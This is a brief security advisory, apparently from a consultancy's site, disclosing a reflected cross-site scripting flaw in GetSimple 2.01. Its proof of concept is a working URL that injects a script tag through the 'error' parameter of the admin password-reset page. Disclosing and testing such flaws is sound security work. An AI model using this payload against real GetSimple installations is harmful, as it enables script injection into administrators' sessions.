Home
Consulting
Advisories
Software
Articles
Contact

GetSimple 2.01 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in GetSimple 2.01 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/getsimple_2.01/admin/resetpassword.php?error=%3Cscript%3Ealert(0)%3C/script%3E


Copyright © 2018 AutoSec Tools LLC